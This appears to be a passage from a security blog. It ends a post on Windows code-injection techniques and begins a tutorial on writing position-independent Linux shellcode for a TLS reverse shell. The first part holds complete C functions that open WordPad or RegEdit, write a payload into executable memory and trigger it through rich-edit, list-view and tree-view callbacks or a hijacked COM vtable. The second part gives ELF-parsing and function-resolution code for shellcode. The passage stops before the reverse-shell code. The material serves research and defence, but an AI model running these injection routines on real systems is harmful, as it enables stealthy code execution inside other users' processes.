    SendMessage(rew, EM_SETWORDBREAKPROC, 0, (LPARAM)cs);

    // 9. Simulate keyboard input to trigger payload
    ip.type           = INPUT_KEYBOARD;
    ip.ki.wVk         = 'A';
    ip.ki.wScan       = 0;
    ip.ki.dwFlags     = 0;
    ip.ki.time        = 0;
    ip.ki.dwExtraInfo = 0;
    
    SetForegroundWindow(rew);
    SendInput(1, &ip, sizeof(ip));

    // 10. Restore original Wordwrap function (if any)
    SendMessage(rew, EM_SETWORDBREAKPROC, 0, (LPARAM)wwf);
    
    // 11. Free memory and close process handle
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Hyphentension

typedef struct tagHyphenateInfo {
  SHORT cbSize;
  SHORT dxHyphenateZone;
  void((WCHAR *,LANGID, long,HYPHRESULT *) * )pfnHyphenate;
} HYPHENATEINFO;

Information about hyphenation for a Rich Edit control can be obtained by sending the EM_GETHYPHENATEINFO message with a pointer to a HYPHENATEINFO structure. However, it assumes the pointer to structure is local memory, thus an attacker must allocate memory for the information using VirtualAllocEx before sending EM_GETHYPHENATEINFO with SendMessage or PostMessage. Before using EM_SETHYPHENATEINFO, it may be required to set the typography options of an edit control. Although I was unable to get this working with WordPad, I suspect it’s possible with a feature rich word processor like Microsoft Word.

AutoCourgette

According to MSDN, the minimum supported client for the EM_SETAUTOCORRECTPROC message is Windows 8, so it’s a relatively new feature. WordPad obviously doesn’t support autocorrecting, so I wasn’t able to get it working. Like hyphenation, this will probably work with Microsoft Word.

Streamception

typedef struct _editstream {
  DWORD_PTR          dwCookie;
  DWORD              dwError;
  EDITSTREAMCALLBACK pfnCallback;
} EDITSTREAM;

When a rich edit control receives the EM_STREAMIN message, it uses the information provided in an EDITSTREAM structure to transfer a stream of data into or out of the control. The pfnCallback field is of type EDITSTREAMCALLBACK and can point to a payload in memory. I made sure EDITSTREAMCALLBACK returns a non-zero value to indicate an error, but the contents of the rich edit control still ends up being erased. It works, but not without destruction of the existing buffer stream. There’s probably a way to solve that problem, but I didn’t investigate.

VOID streamception(LPVOID payload, DWORD payloadSize) {
    HANDLE        hp;
    DWORD         id;
    HWND          wpw, rew;
    LPVOID        cs, ds;
    SIZE_T        rd, wr;
    EDITSTREAM    es;
    
    // 1. Get window handles
    wpw = FindWindow(L"WordPadClass", NULL);
    rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);
    
    // 2. Obtain the process id and try to open process
    GetWindowThreadProcessId(rew, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 3. Allocate RWX memory and copy the payload there.
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);

    // 4. Allocate RW memory and copy the EDITSTREAM structure there.
    ds = VirtualAllocEx(hp, NULL, sizeof(EDITSTREAM),
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        
    es.dwCookie    = 0;
    es.dwError     = 0;
    es.pfnCallback = cs;
    
    WriteProcessMemory(hp, ds, &es, sizeof(EDITSTREAM), &wr);
    
    // 5. Trigger payload with EM_STREAMIN
    SendMessage(rew, EM_STREAMIN, SF_TEXT, (LPARAM)ds);

    // 6. Free memory and close process handle
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Oleum

After working on the first four, I started to examine the potential of EM_SETOLECALLBACK. It was around the same time Adam updated his blog to say he discovered this message too. The EM_GETOLECALLBACK message does not appear to be well documented, and when sent to the rich edit window with SendMessage will crash if LPARAM does not point to locally accessible memory. Moreover, EM_GETOLECALLBACK did not return a pointer to IRichEditOleCallback as expected, it returned a pointer to IRichEditOle instead. Because of this, I did not use EM_SETOLECALLBACK. Instead, the heap memory holding IRichEditOle.lpVtbl is overwritten with an address to a copy of the original table with one method pointing to the payload, in this case GetClipboardData.

We can’t overwrite the virtual function table because it resides in read-only memory. Well, perhaps you can overwrite after changing the memory protection, but I wouldn’t recommend it. Making a copy, updating one entry and simply redirecting execution through that makes more sense.

typedef struct _IRichEditOle_t {
    ULONG_PTR QueryInterface;
    ULONG_PTR AddRef;
    ULONG_PTR Release;
    ULONG_PTR GetClientSite;
    ULONG_PTR GetObjectCount;
    ULONG_PTR GetLinkCount;
    ULONG_PTR GetObject;
    ULONG_PTR InsertObject;
    ULONG_PTR ConvertObject;
    ULONG_PTR ActivateAs;
    ULONG_PTR SetHostNames;
    ULONG_PTR SetLinkAvailable;
    ULONG_PTR SetDvaspect;
    ULONG_PTR HandsOffStorage;
    ULONG_PTR SaveCompleted;
    ULONG_PTR InPlaceDeactivate;
    ULONG_PTR ContextSensitiveHelp;
    ULONG_PTR GetClipboardData;
    ULONG_PTR ImportDataObject;
} _IRichEditOle;

The following code uses wordpad as an example because I couldn’t find any other applications on an evaluation version of windows that used the EM_SETOLECALLBACK message. It replaces the address of GetClipboardData with address of payload and then sends WM_COPY to the rich edit window.

VOID oleum(LPVOID payload, DWORD payloadSize) {
    HANDLE                hp;
    DWORD                 id;
    HWND                  rew;
    LPVOID                cs, ds, ptr, mem, tbl;
    SIZE_T                rd, wr;
    _IRichEditOle         reo;
    
    // 1. Get the window handle
    rew = FindWindow(L"WordPadClass", NULL);
    rew = FindWindowEx(rew, NULL, L"RICHEDIT50W", NULL);
    
    // 2. Obtain the process id and try to open process
    GetWindowThreadProcessId(rew, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 3. Allocate RWX memory and copy the payload there
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Allocate RW memory for the current address
    ptr = VirtualAllocEx(hp, NULL, sizeof(ULONG_PTR),
      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
      
    // 5. Query the interface
    SendMessage(rew, EM_GETOLEINTERFACE, 0, (LPARAM)ptr);
    
    // 6. Read the memory address
    ReadProcessMemory(hp, ptr, &mem, sizeof(ULONG_PTR), &wr);

    // 7. Read IRichEditOle.lpVtbl
    ReadProcessMemory(hp, mem, &tbl, sizeof(ULONG_PTR), &wr);

    // 8. Read virtual function table
    ReadProcessMemory(hp, tbl, &reo, sizeof(_IRichEditOle), &wr);

    // 9. Allocate memory for copy of virtual table
    ds = VirtualAllocEx(hp, NULL, sizeof(_IRichEditOle),
      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
      
    // 10. Set the GetClipboardData method to address of payload
    reo.GetClipboardData = (ULONG_PTR)cs;
    
    // 11. Write new virtual function table to remote memory
    WriteProcessMemory(hp, ds, &reo, sizeof(_IRichEditOle), &wr);
    
    // 12. update IRichEditOle.lpVtbl
    WriteProcessMemory(hp, mem, &ds, sizeof(ULONG_PTR), &wr); 
    
    // 13. Trigger payload by invoking the GetClipboardData method
    PostMessage(rew, WM_COPY, 0, 0);
    
    // 14. Restore original value of IRichEditOle.lpVtbl
    WriteProcessMemory(hp, mem, &tbl, sizeof(ULONG_PTR), &wr);
    
    // 15. Free memory and close process handle
    VirtualFreeEx(hp, ptr,0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    
    CloseHandle(hp);   
}

Listplanting

Sorting items/groups in a ListView control can be customized using the LVM_SORTGROUPS, LVM_INSERTGROUPSORTED and LVM_SORTITEMS messages. The following structure is used for LVM_INSERTGROUPSORTED.

typedef struct tagLVINSERTGROUPSORTED {
  PFNLVGROUPCOMPARE pfnGroupCompare;
  void              *pvData;
  LVGROUP           lvGroup;
} LVINSERTGROUPSORTED, *PLVINSERTGROUPSORTED;

The following code uses the registry editor and LVM_SORTITEMS to trigger the payload. The problem is that the callback function will be invoked for every item in the list. If no items are in the list, the function isn’t invoked at all. I can think of some ways to work around these issues such as checking how many items are in the list, adding items, removing items, playing around with the parameters passed to the callback function.

VOID listplanting(LPVOID payload, DWORD payloadSize) {
    HANDLE        hp;
    DWORD         id;
    HWND          lvm;
    LPVOID        cs;
    SIZE_T        wr;
    
    // 1. get the window handle
    lvm = FindWindow(L"RegEdit_RegEdit", NULL);
    lvm = FindWindowEx(lvm, 0, L"SysListView32", 0);
   
    // 2. Obtain the process id and try to open process
    GetWindowThreadProcessId(lvm, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 3. Allocate RWX memory and copy the payload there.
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Trigger payload
    PostMessage(lvm, LVM_SORTITEMS, 0, (LPARAM)cs);
    
    // 5. Free memory and close process handle
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Treepoline

typedef struct tagTVSORTCB {
  HTREEITEM    hParent;
  PFNTVCOMPARE lpfnCompare;
  LPARAM       lParam;
} TVSORTCB, *LPTVSORTCB;

It’s possible to customize sorting via the TVM_SORTCHILDRENCB message. For each item, the payload will be executed, so this also requires additional checks to avoid multiple instances running. The first thing we do after obtaininig the TreeListView window handle is get the root item. An item is required before the callback function is invoked.

// requires elevated privileges
VOID treepoline(LPVOID payload, DWORD payloadSize) {
    HANDLE        hp;
    DWORD         id;
    HWND          wpw, tlv;
    LPVOID        cs, ds, item;
    SIZE_T        rd, wr;
    TVSORTCB      tvs;
    
    // 1. get the treeview handle
    wpw = FindWindow(L"RegEdit_RegEdit", NULL);
    tlv = FindWindowEx(wpw, 0, L"SysTreeView32", 0);
    
    // 2. Obtain the process id and try to open process
    GetWindowThreadProcessId(tlv, &id);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 3. Allocate RWX memory and copy the payload there.
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Obtain the root item in tree list
    item = (LPVOID)SendMessage(tlv, TVM_GETNEXTITEM, TVGN_ROOT, 0);

    tvs.hParent     = item;
    tvs.lpfnCompare = cs;
    tvs.lParam      = 0;
    
    // 5. Allocate RW memory and copy the TVSORTCB structure
    ds = VirtualAllocEx(hp, NULL, sizeof(TVSORTCB),
        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        
    WriteProcessMemory(hp, ds, &tvs, sizeof(TVSORTCB), &wr);
    
    // 6. Trigger payload
    SendMessage(tlv, TVM_SORTCHILDRENCB, 0, (LPARAM)ds);

    // 7. Free memory and close process handle
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    
    CloseHandle(hp);
}

That’s all!. PoC here.

Posted in injection, security, shellcode, windows | Tagged , , , , , , , , , , | Leave a comment

Shellcode: A reverse shell for Linux in C with support for TLS/SSL

Shellcode: A reverse shell in C for Linux with support for TLS/SSL

  1. Introduction
  2. History
  3. Definitions
    1. Position-independent code (PIC)
    2. Position-independent executable (PIE)
    3. Thread Local Storage or Transport Layer Security (TLS)
    4. Address Space Layout Randomization (ASLR)
    5. Executable and Link Format (ELF)
  4. Base of Host Process
    1. Arbitrary Code Segment Address
    2. Process File System (procfs)
  5. ELF Layout
    1. File Header
    2. Program Header
    3. Section Header
    4. Dynamic Structure
    5. Symbol Structure
  6. Base of C Library (libc)
    1. Process File System (procfs)
    2. Global Offset Table (DT_PLTGOT)
    3. Debug Structure (DT_DEBUG)
    4. Thread Local Storage (TLS)
  7. Resolving Address of Functions
    1. ELF Hash Table (DT_HASH)
    2. GNU Hash Table (DT_GNU_HASH)
    3. Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)
    4. Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)
  8. Loading Shared Objects
    1. __libc_dlopen_mode and __libc_dlsym
    2. Using /etc/ld.so.conf.d/
  9. Reverse Shell using SSL/TLS
    1. Data Table
    2. Strings
    3. Compiling
    4. Testing
  10. Summary

1. Introduction

This post will describe how to implement a position-independent code for Linux that can resolve the address of functions in the GNU C Library. The GNU Compiler Collection on an AMD64 build of Debian Linux will be used to compile a source code in C and extract the shellcode from binary. Once you’re familiar with the entire process, writing shellcode for other architectures should be easier. There are many tutorials about writing shellcode for Linux using system calls, but very few, if any at all, using the GNU C Library. The lack of tutorials can be attributed to the fact that process management, file system operations and network connectivity, can be easily implemented on Linux using system calls. In contrast with Linux, the Windows kernel is based on subsystems where the invocation of system calls is not a simple straight forward process. Due to the complexity of system calls on windows, it’s necessary to resolve the address of wrapper functions in Dynamic-link Libraries to do anything useful. This is why tutorials about writing shellcode in C for Windows well outnumber those for Linux.

For additional reading material, I would recommend reading Cheating the ELF – Subversive Dynamic Linking to Libraries by the grugq and the book Linux Binary Analysis by Ryan “elfmaster” O’Neill. There’s a lot of free reading material online that you can find with any good search engine. A PoC can be found here. The following screenshot shows the shellcode connected to the TCP/IP tool ncat that comes bundled with nmap.

ncat

2. History

The following table ordered in chronological order, highlights some examples of those using C to implement shellcode. There are probably many more than what I’ve listed. Feel free to email me the details of anyone else and I’ll update accordingly.

August 1999 Sebastian “stealth” Krahmer from Team TESO publishes Hellkit 1.1, a tool that converts C code into shellcode for Linux.
July 2003 Inspired by Hellkit, the author of scapy, Philippe Biondi publishes shellforge that uses a combination of C header files and Python to convert a C source code into a shellcode for Linux.
September 2003 Dave Aitel from ImmunitySec publishes MOSDEF, a C-like compiler that generates shellcode for Windows and Linux.
September 2006 Benjamin Caillat publishes WiShMaster, a tool that generates shellcode for Windows from a C source code.
May 2010 Didier Stevens publishes article on writing shellcode for Windows using C.
July 2010 Nick Harbour publishes article on writing shellcode for Windows using C.
November 2011 Radare publish ragg-cc, a shellcode compiler based on gcc and sflib (shellforge).
August 2013 Matt Graeber publishes article on writing shellcode for Windows using C.
November 2013 Shellforge G4 published. It’s a fork of shellforge now maintained by Albert Sellarès.
May 2014 humeafo publishes a shellcode compiler for windows that uses llvm/clang.
December 2015 Binary Ninja publish a shellcode compiler for Windows and Linux. Target architectures include x86, x64, arm, armeb, aarch64, mips, mipsel, ppc, ppcel.
May 2016 Jack Ullrich publishes article on writing shellcode for Windows using C.
May 2016 Phrack publish issue #69 with article by Justin “fishstiqz” Fisher that describes using gcc-mingw to generate windows shellcode in C.
June 2016 Guillaume Delugré publishes Shell-Factory, a tool that uses C++ to generate shellcode for Linux.
August 2016 Ixty publishes shellcode generator that derives a cross-platform shellcode for Linux targetting x86, amd64, aarch32 and aarch64.
November 2016 Ionut Popescu publishes a shellcode compiler for Windows.
Jan 2018 SheLLVM publishes a shellcode compiler for Windows.

3. Definitions

A brief description of some abbreviations used in this post are provided to those unfamiliar with what they mean.

3.1 Position-independent code (PIC)

When a PIC is executed, it should successfully run regardless of where it resides in memory which is compulsory for any shellcode. Unless a target binary is statically linked, dependencies should always be resolved dynamically.

3.2 Position-independent executables (PIE)

Executable binaries made entirely from PIC are mandatory by some systems lacking a Memory Management Unit. However, it’s also used by Address Space Layout Randomization to increase the difficulty of exploiting vulnerabilities. The version of Debian I’m working with has a build of GCC that enables PIE generated binaries by default.

3.3 Thread Local Storage / Transport Layer Security (TLS)

TLS is synonymous with the protocol that protects the vast majority of online communications, but it can also refer to a local area of memory containing global variables that are only accessible to a single thread.

3.4 Address Space Layout Randomization (ASLR)

ASLR is a technique invented by The PaX Team and published in July 2001. It is intended to mitigate against the exploitation of vulnerabilities by randomizing the memory addresses of a process, including the base of the executable, the stack, the heap and libraries. ASLR is not used for statically linked binaries.

3.5 Executable and Link Format

The original specification for the Executable and Link Format (ELF) published in May 1995 by the Linux Foundation. Before attempting to locate the base address of the GNU C Library and any of its exported functions, it’s important to familiarize yourself with the structure of an ELF binary.

4. Base of Host Process

There are three ways to obtain the base address of the host process, or two depending on where the shellcode resides in memory. For shellcode running inside an executable segment, simply read the value of the instruction pointer/program counter and then repeatedly subtract the value of PAGE_SIZE (usually 4096 bytes) from that (aligned) pointer until a valid ELF header is found. If the shellcode is running from executable memory allocated by the mmap function, we can try reading the address from /proc/self/maps using system calls or somehow obtain an arbitrary address from the stack or heap. You can also try reading the base address of libc.so from the Thread Local Storage (TLS) and obtain the link_map structure that contains the base address. I discuss this last approach in section 6.4 when finding the base of libc.so

4.1 Arbitrary Code Address

The get_rip() function with AMD64 assembly inlined simply loads the current value of the Instruction Pointer (IP) into the RAX register before returning. The get_base function will then compare the first 32-bits or 4-bytes of address with what is normally found at the start of an ELF binary. The search continues by subtracting PAGE_SIZE or 4096 bytes until it either finds the base address or crashes. There are of course ways to avoid crashing using system calls.

void* get_rip(void) {
    void* ret;

    __asm__ __volatile__ (
      "lea (%%rip), %%rax\n"
      ".globl get_rip_label	\n"
      "get_rip_label:		    \n"
      "mov %%rax, %0" : "=r"(ret));

    return ret;
}

void *get_base(void* addr) {
    uint64_t base = (uint64_t)addr;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

4.2 Process File System

/proc/self/maps contains a list of memory addresses, the permissions and the path of module mapped into that memory space. The first address found should belong to the host process. The following code will read the first address, convert the string to binary and return. The system calls are using inline assembly that might look suspicious.

uint64_t hex2bin(const char hex[]) {
    uint64_t r=0;
    char     c;
    int      i;
    
    for(i=0; i<16; i++) {
      c = hex[i];
      if(c >= '0' && c <= '9') { 
        c = c - '0';
      } else if(c >= 'a' && c <= 'f') {
        c = c - 'a' + 10;
      } else if(c >= 'A' && c <= 'F') {
        c = c - 'A' + 10;
      } else break;
      r *= 16;
      r += c;
    }
    return r;
}

void *get_base(void) {
    int  maps;
    void *addr;
    char line[32];
    int  str[8];
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    maps = _open((char*)str, O_RDONLY, 0);
    if(!maps) return NULL;
    
    _read(maps, line, 16);
    _close(maps);
    
    addr = (void*)hex2bin(line);
    return addr;
}

If the system has patches by Grsecurity installed and GRKERNSEC_PROC_MEMMAP is enabled, this code will not work because the option removes addresses from /proc/[pid]/[smaps|maps|stat].

5. ELF Layout

Parsing ELF files in memory is required if you want to find the address of functions. I will only discuss what’s necessary to locate the symbol, string and hash tables.

5.1 File Header

The most important header of all. Every valid ELF executable and shared object should begin with this file header. The binary is interpreted using the following structure.

typedef struct {
  unsigned char e_ident[EI_NIDENT]; /* File identification.              */
  Elf64_Half  e_type;               /* File type.                        */
  Elf64_Half  e_machine;            /* Machine architecture.             */
  Elf64_Word  e_version;            /* ELF format version.               */
  Elf64_Addr  e_entry;              /* Entry point.                      */
  Elf64_Off   e_phoff;              /* Program header file offset.       */
  Elf64_Off   e_shoff;              /* Section header file offset.       */
  Elf64_Word  e_flags;              /* Architecture-specific flags.      */
  Elf64_Half  e_ehsize;             /* Size of ELF header in bytes.      */
  Elf64_Half  e_phentsize;          /* Size of program header entry.     */
  Elf64_Half  e_phnum;              /* Number of program header entries. */
  Elf64_Half  e_shentsize;          /* Size of section header entry.     */
  Elf64_Half  e_shnum;              /* Number of section header entries. */
  Elf64_Half  e_shstrndx;           /* Section name strings section.     */
} Elf64_Ehdr;

The only fields we need to concern ourselves with for the shellcode are e_ident, e_phoff, e_phnum, e_shoff and e_shnum. The following shows the header for /bin/ls using: readelf -h /bin/ls

  ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x5430
  Start of program headers:          64 (bytes into file)
  Start of section headers:          128816 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         30
  Section header string table index: 29

5.2. Program Header

To resolve the address of functions, we only need to work with PT_DYNAMIC and PT_LOAD types. PT_LOAD indicates a loadable program segment such as code (.text) or data (.data). An ELF binary should always have at least one PT_LOAD header, but if PT_DYNAMIC is missing, this indicates the binary has been linked statically and requires resolving functions via the section headers read from disk. Of course, you can always use hardcoded addresses.

typedef struct {
  Elf64_Word  p_type;               /* Entry type.                       */
  Elf64_Word  p_flags;              /* Access permission flags.          */
  Elf64_Off   p_offset;             /* File offset of contents.          */
  Elf64_Addr  p_vaddr;              /* Virtual address in memory image.  */
  Elf64_Addr  p_paddr;              /* Physical address (not used).      */
  Elf64_Xword p_filesz;             /* Size of contents in file.         */
  Elf64_Xword p_memsz;              /* Size of contents in memory.       */
  Elf64_Xword p_align;              /* Alignment in memory and file.     */
} Elf64_Phdr;

Example of dumping program headers for /bin/ls using: readelf -l /bin/ls

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x00000000000001f8 0x00000000000001f8  R E    0x8
  INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x000000000001e184 0x000000000001e184  R E    0x200000
  LOAD           0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000001260 0x0000000000002440  RW     0x200000
  DYNAMIC        0x000000000001edb8 0x000000000021edb8 0x000000000021edb8
                 0x00000000000001f0 0x00000000000001f0  RW     0x8
  NOTE           0x0000000000000254 0x0000000000000254 0x0000000000000254
                 0x0000000000000044 0x0000000000000044  R      0x4
  GNU_EH_FRAME   0x000000000001ab74 0x000000000001ab74 0x000000000001ab74
                 0x000000000000082c 0x000000000000082c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000000c78 0x0000000000000c78  R      0x1

The LOAD header with Offset FileSiz 0x1e184 is the .text segment. We know this because the flags have Read(R) and Execute(E). The other LOAD header has Read(R) and Write(W) flags, and indicates the .data segment. The only time you will see all three together (RWE) is in the OMAGIC format or a potentially malicious binary, of course. The following code when provided the base address of an ELF will return the first program header of type, or zero if one can’t be found.

// return pointer to program header
Elf64_Phdr *elf_get_phdr(void *base, int type) {
    int        i;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    
    // sanity check on base and type
    if(base == NULL || type == PT_NULL) return NULL;
    
    // ensure this some semblance of ELF header
    if(*(uint32_t*)base != 0x464c457fUL) return NULL;
    
    // ok get offset to the program headers
    ehdr=(Elf64_Ehdr*)base;
    phdr=(Elf64_Phdr*)(base + ehdr->e_phoff);
    
    // search through list to find requested type
    for(i=0; i<ehdr->e_phnum; i++) {
      // if found
      if(phdr[i].p_type == type) {
        // return pointer to it
        return &phdr[i];
      }
    }
    // return NULL if not found
    return NULL;
}

5.3 Section Headers

There are at least two ways to calculate the number of entries in the symbol table. The first is by dividing Elf64_Shdr.sh_size for SHT_SYMTAB or SHT_DYNSYM by sizeof(Elf64_Sym) or DT_SYMENT from the dynamic section. The other way is using the nchain value from DT_HASH structure. The problem is that DT_HASH is not always available. In its place will be DT_GNU_HASH that does not indicate how many entries are in the symbol table. For the shellcode, I use a method that works for both static and dynamically linked binaries, but it requires opening the file on disk and mapping into memory.

typedef struct {
       Elf64_Word      sh_name;       /* index to name of section in string table */
       Elf64_Word      sh_type;       /* type of section                          */
       Elf64_Xword     sh_flags;      /* section flags                            */
       Elf64_Addr      sh_addr;       /* memory address of section                */
       Elf64_Off       sh_offset;     /* file offset for section                  */
       Elf64_Xword     sh_size;       /* size of section                          */
       Elf64_Word      sh_link;       /* index to associated                      */
       Elf64_Word      sh_info;       /* extra info about section                 */
       Elf64_Xword     sh_addralign;  /* aligned address                          */
       Elf64_Xword     sh_entsize;    /* size of entry if section is a table      */
} Elf64_Shdr;

The only fields required here are sh_type, sh_offset, sh_size and sh_link. An example of processing the symbol table via section headers is in get_proc_address3.

5.4 Dynamic Structure

The .dynamic section or table contains a list of dynamic entries each of which can be interepreted using the following structure.

typedef struct {
  Elf64_Sxword  d_tag;              /* Entry type.    */
  union {
    Elf64_Xword d_val;              /* Integer value. */
    Elf64_Addr  d_ptr;              /* Address value. */
  } d_un;
} Elf64_Dyn;

The following d_tag values can be used to find specific types. A d_tag value of DT_NULL indicates where the section/table ends.

Type Description Value d_un
DT_PLTGOT Pointer to the Procedure Linkage Table / Global Offset Table 3 d_ptr
DT_HASH ELF hash used to locate symbol. 4 d_ptr
DT_GNU_HASH GNU style hash used to locate symbol. 0x6ffffef5 d_ptr
DT_STRTAB Pointer to the string table. 5 d_ptr
DT_SYMTAB Pointer to the symbol table 6 d_ptr
DT_SYMENT The size of a symbol entry 11 d_val
DT_SONAME Index in string table to the Shared Object name 14 d_val
DT_DEBUG Pointer to an r_debug structure containing the link_map 21 d_ptr
Dynamic section at offset 0x1edb8 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libselinux.so.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x34c8
 0x000000000000000d (FINI)               0x15c4c
 0x0000000000000019 (INIT_ARRAY)         0x21e388
 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
 0x000000000000001a (FINI_ARRAY)         0x21e390
 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
 0x000000006ffffef5 (GNU_HASH)           0x298
 0x0000000000000005 (STRTAB)             0x1010
 0x0000000000000006 (SYMTAB)             0x350
 0x000000000000000a (STRSZ)              1501 (bytes)
 0x000000000000000b (SYMENT)             24 (bytes)
 0x0000000000000015 (DEBUG)              0x0
 0x0000000000000003 (PLTGOT)             0x21f000
 0x0000000000000002 (PLTRELSZ)           2544 (bytes)
 0x0000000000000014 (PLTREL)             RELA
 0x0000000000000017 (JMPREL)             0x2ad8
 0x0000000000000007 (RELA)               0x1770
 0x0000000000000008 (RELASZ)             4968 (bytes)
 0x0000000000000009 (RELAENT)            24 (bytes)
 0x000000006ffffffb (FLAGS_1)            Flags: PIE
 0x000000006ffffffe (VERNEED)            0x1700
 0x000000006fffffff (VERNEEDNUM)         1
 0x000000006ffffff0 (VERSYM)             0x15ee
 0x000000006ffffff9 (RELACOUNT)          192
 0x0000000000000000 (NULL)               0x0

Take a look at the following .dynamic section for libc.so and notice the type of SONAME which is “shared object name”. To read this, add Elf64_Dyn.d_un.d_val for DT_SONAME to the Elf64_Dyn.d_un.d_ptr for DT_STRTAB and it will give you a pointer to the string “libc.so.6”

Dynamic section at offset 0x198ba0 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
 0x000000000000000e (SONAME)             Library soname: [libc.so.6]
 .....

The following code is used to locate a dynamic type.

uint64_t elf_get_delta(void *base) {
    Elf64_Phdr *phdr;
    uint64_t   low;
    
    // get pointer to PT_LOAD header
    // first should be executable
    phdr = elf_get_phdr(base, PT_LOAD);
    
    if(phdr != NULL) {
      low = phdr->p_vaddr;
    }
    return (uint64_t)base - low;
}

// return pointer to first dynamic type found
Elf64_Dyn *elf_get_dyn(void *base, int tag) {
    Elf64_Phdr *dynamic;
    Elf64_Dyn  *entry;
    
    // 1. obtain pointer to DYNAMIC program header
    dynamic = elf_get_phdr(base, PT_DYNAMIC);

    if(dynamic != NULL) {
      entry = (Elf64_Dyn*)(dynamic->p_vaddr + elf_get_delta(base));
      // 2. obtain pointer to type
      while(entry->d_tag != DT_NULL) {
        if(entry->d_tag == tag) {
          return entry;
        }
        entry++;
      }
    }
    return NULL;
}

5.5 Symbol Structure

If a binary is being read from disk, the section headers can be used to calculate the location of the symbol table and how many entries it has. The symbol and table entries can be identified by checking the sh_type field of each section header for SHT_SYMTAB or SHT_DYNSYM. You may be asking yourself, what’s the difference?. Typically, object files will contain a .symtab section for the linker, but no .dynsym section. ELF binaries that are dynamically linked will contain a .dynsym section, but no .symtab section. However, if the application is statically linked, the binary will only contain a .symtab section. In practice, you should check for both simultaneously in the event that only one exists.

If a binary is being read from memory that was already mapped by the ELF dynamic linker/loader, the section headers won’t be available and there’s only the dynamic program header (PT_DYNAMIC) to work with. DT_STRTAB, DT_SYMTAB, DT_HASH or DT_GNU_HASH are required for locating the address of functions using the .dynamic section. get_proc_address demonstrates how to lookup by ELF or GNU hash.

typedef struct {
  Elf64_Word    st_name;            /* String table index of name.   */
  unsigned char st_info;            /* Type and binding information. */
  unsigned char st_other;           /* Reserved (not used).          */
  Elf64_Half    st_shndx;           /* Section index of symbol.      */
  Elf64_Addr    st_value;           /* Symbol value.                 */
  Elf64_Xword   st_size;            /* Size of associated object.    */
} Elf64_Sym;
Symbol table '.dynsym' contains 136 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
